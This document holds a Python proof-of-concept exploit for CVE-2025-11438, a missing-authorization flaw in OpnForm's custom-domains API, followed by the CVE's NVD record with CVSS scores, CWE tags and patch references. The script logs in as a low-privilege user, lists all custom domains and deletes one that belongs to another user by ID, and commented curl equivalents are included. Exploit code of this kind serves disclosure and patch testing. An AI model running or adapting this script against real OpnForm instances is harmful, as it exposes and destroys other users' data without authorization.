CVE-2025-11438

# CVE-2025-11438 PoC - OpnForm Custom Domains Missing Authorization # Vulnerability: Missing authorization on /custom-domains API endpoint # Affected: JhumanJ OpnForm <= 1.9.3 import requests # Target configuration TARGET_URL = "https://target-opnform-instance.com" # Low-privilege user credentials (registered or obtained account) USERNAME = "[email protected]" PASSWORD = "password123" # Step 1: Authenticate to obtain session/token session = requests.Session() login_url = f"{TARGET_URL}/login" # Perform login (adjust based on actual login mechanism) login_payload = { "email": USERNAME, "password": PASSWORD } response = session.post(login_url, json=login_payload) print(f"[*] Login response status: {response.status_code}") # Step 2: Access the vulnerable /custom-domains endpoint # Without proper authorization checks, low-priv users can access/modify # custom domain resources belonging to other users custom_domains_url = f"{TARGET_URL}/api/custom-domains" # Exploit: List all custom domains (IDOR - Insecure Direct Object Reference) response = session.get(custom_domains_url) print(f"[*] Custom domains response: {response.status_code}") print(f"[*] Response body: {response.text}") # Exploit: Attempt to modify/delete a custom domain belonging to another user # Replace 'target_domain_id' with an actual domain ID target_domain_id = 1 modify_url = f"{TARGET_URL}/api/custom-domains/{target_domain_id}" delete_response = session.delete(modify_url) print(f"[*] Delete response: {delete_response.status_code}") # Alternative: Use curl commands # curl -X GET 'https://target.com/api/custom-domains' -H 'Cookie: session=...' # curl -X DELETE 'https://target.com/api/custom-domains/1' -H 'Cookie: session=...'

{"cve": {"id": "CVE-2025-11438", "sourceIdentifier": "[email protected]", "published": "2025-10-08T07:15:31.283", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in JhumanJ OpnForm up to 1.9.3. This vulnerability affects unknown code of the file /custom-domains of the component API Endpoint. Such manipulation leads to missing authorization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The name of the patch is beb153ce52dceb971c1518f98333328c95f1ba20. It is best practice to apply a patch to resolve this issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}, {"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jhumanj:opnform:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.9.3", "matchCriteriaId": "C896A041-D9C4-42F0-9477-C57E07D6EFF6"}]}]}], "references": [{"url": "https://docs.google.com/document/d/1GUjJA9vUbsXUngAv6ySsbCIhVynf8_djardLZYEDOe0/edit?tab=t.0#heading=h.gm61tyll8uys", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/JhumanJ/OpnForm/pull/900/commits/beb153ce52dceb971c1518f98333328c95f1ba20", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://vuldb.com/?ctiid.327375", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327375", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.666879", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}